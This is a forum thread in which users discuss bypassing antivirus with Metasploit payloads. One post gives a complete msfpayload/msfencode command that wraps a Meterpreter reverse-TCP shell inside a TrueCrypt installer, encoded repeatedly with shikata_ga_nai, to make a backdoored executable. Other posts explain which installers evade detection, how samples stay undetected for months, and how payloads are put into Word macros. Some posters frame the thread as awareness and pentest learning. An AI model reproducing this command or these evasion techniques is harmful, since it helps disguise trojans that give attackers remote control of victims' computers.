Antivirus bypass

[pentest09]

Hers a video of a demo I made in response to a post on another site stating that AVG picks up all the payloads. It doesnt!!!

Bypass AntiVirus

Please comment.

[Focaccia]

"how to bypass AVs, but i dont show you how", that's funny

[pentest09]

It was just to show how it can be done as there is a bit of confusion as to various payloads being picked up by certain AVs if it can be done so its not that hard to find out shikata etc but it matters what exe you use some have packers that prevent the encoding try and see what you come up with didnt want the sig all over virus total etc and as its a public vid didnt want misuse of it.

thanks for the reply tho.

[spawn]

encoding scheme has "ommited",
I think that you used another exe to generate a payload and encoded with shikata_ga_nai 10 x
the size of payload is very large, 3,3mb
I'm wrong ?

Regards

[espreto]

\o/

Code:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=5555 R | msfencode -t exe -x /root/Truecrypt_70.exe -o /root/Truecrypt_70_backdoor.exe -e x86/shikata_ga_nai -c 10

¬¬"

[TAPE]

Hehe
It was never going to stay secret..

Its a shame you ommit the commands and didnt clarify (although it was obvious) which file was used for the template.
But can understand your train of thought on why you did it.

Must admit that I was a little surprised to see that using shikata_ga_nai encoder only worked with the AV bypass, I had only tested smaller windows executables and had to encode the hell out of them to bypass AV.

http://www.backtrack-linux.org/forum...r-payload.html

[pentest09]

Hi fellas

Thanks for taking the time to reply, here's the thing I posted other videos showing what I have learned
and gave step by step instructions on everything I did and why, for those outside of the forums, the basic home user etc..to make them aware of these attacks and not just go out and buy a top name AV and they have nothing more to worry about. I have had so many tops come to me with Trojans with bundled software from top names and the machines are full of bad stuff.Now I have had lots of views in the forum and no replies so thought i would do this video in the raw so to speak (and look I get replies) also as it was public on various vid sites did not want all and sundry making these payloads. This forum is a place for responsible security issues and findings so I guess I was being responsible for the one part and the guys on here who know their stuff and are trustworthy would get the jist of what was carried out in the exploit. I have learnt a lot on here and "Tape" ur blog has taught me a lot Thanks....Btw I started the Av bypass using your tutorial modified it from there so shout goes out to you my friend....


I have also made a video on windows 7 and the adobe cooltype as it works and ppl reckon it doesn't.

Best way to try them out is to get all the major AV trials, install them on vm-machines using snapshots and try to evade form there the main reason I tried lots of different encoding options was :

1: My main machine has ESET installed and that picks up practically everything others do not so the main
goal was to evade that.

2: The exes have different packing methods i think and trial and error ends up with a good exe payload

AVG picks up bad file sigs on major exes Adobe etc so it tried a not so common app java installer works actually
and that surprised me so does the True Crypt app most payloads work with others but in this instance AVG picks up
bad file sig as i said and these apps don't trigger that so they are 100% on all the majors.

Please note I'm no expert and don't claim to be so all advice most welcome

Long post I know but hey u deserve an explanation just for replying .

espreto! you got most of it correct btw.

Cheers all Pentest09

[pentest09]

Well looks like this demo ended up getting smashed all over virus total ESET picks up all of them now , had this working undetected for nearly 8 months and 2 weeks after this demo it ends up detected.. back to square one....

[TAPE]

I have a reverse tcp meterpreter session exe made up that is still very much undetected.
In fact I have a few and all over 4 months old and still functioning.
They are all based on what I did in my blog... However, if I were to post the exact method I used.. you can bet
your life it would be checked, tested and checked with VirusTotal and accordingly rendered useless..

A good lesson learned on your part I would say.

[pentest09]

Yeah its ok i just got it passed eset once again, but i find if i use multi-encoding the exe doesn't execute correctly,yeah wont do that one again...still having problems trying to inject payload into macros at the moment in .doc any ideas i get errors it opens the payload and places it in the target drive but thats as far as it gets, doesn't execute the payload, followed step by step met unleashed version but using 2007 not 2003 slightly differs. Thanks for the reply.

edit: but i find if i use multi-encoding the exe doesn't execute correctly: its ok got it working and thanks to this problem upon resolving and trying to find a new way have in fact tried with 20 AVs in snapshots on vmware, with heuristcs and 100% undetected . So its all cushteee!!!